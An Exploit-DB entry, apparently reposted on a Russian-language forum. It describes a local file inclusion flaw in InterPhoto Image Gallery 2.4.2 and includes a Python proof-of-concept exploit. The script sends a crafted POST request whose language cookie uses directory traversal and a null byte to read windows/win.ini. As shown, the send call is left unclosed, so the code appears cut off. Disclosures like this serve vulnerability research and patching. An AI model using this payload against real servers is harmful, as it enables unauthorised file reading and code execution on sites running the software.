- 34,644
- 0
- 18 Дек 2022
- 35410
- Проверка EDB
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- Платформа
- N/A
- Дата публикации
- 2011-03-04
source: https://www.securityfocus.com/bid/46759/info
InterPhoto Image Gallery is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.
An attacker can exploit this vulnerability to obtain potentially sensitive information and to execute arbitrary local scripts in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible.
InterPhoto Image Gallery 2.4.2 is vulnerable; other versions may also be affected.
# ------------------------------------------------------------------------
# Software................InterPhoto 2.4.2
# Vulnerability...........Local File Inclusion
# Threat Level............Critical (4/5)
# Download................http://www.weensoft.com/
# Release Date............3/4/2011
# Tested On...............Windows Vista + XAMPP
# ------------------------------------------------------------------------
# Author..................AutoSec Tools
# Site....................http://www.autosectools.com/
# Email...................John Leitch <[email protected]>
# ........................Bryce Darling <[email protected]>
# ------------------------------------------------------------------------
# --Description--
# A local file inclusion vulnerability in InterPhoto 2.4.2 can be
# exploited to include arbitrary files.
# --PoC--
import socket
host = 'localhost'
path = '/interphoto'
port = 80
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
s.send('POST ' + path + '/about.php HTTP/1.1\r\n'
'Host: localhost\r\n'
'Connection: keep-alive\r\n'
'User-Agent: x\r\n'
'Content-Length: 0\r\n'
'Cache-Control: max-age=0\r\n'
'Origin: null\r\n'
'Content-Type: multipart/form-data; boundary=----x\r\n'
'Cookie: IPLANGV6O1or24t6cI=' + '..%2f' * 8 + 'windows%2fwin.ini%00\r\n'
'Accept: text/html\r\n'
'Accept-Language: en-US,en;q=0.8\r\n'
'Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3\r\n'
print s.recv(8192)
- Источник
- www.exploit-db.com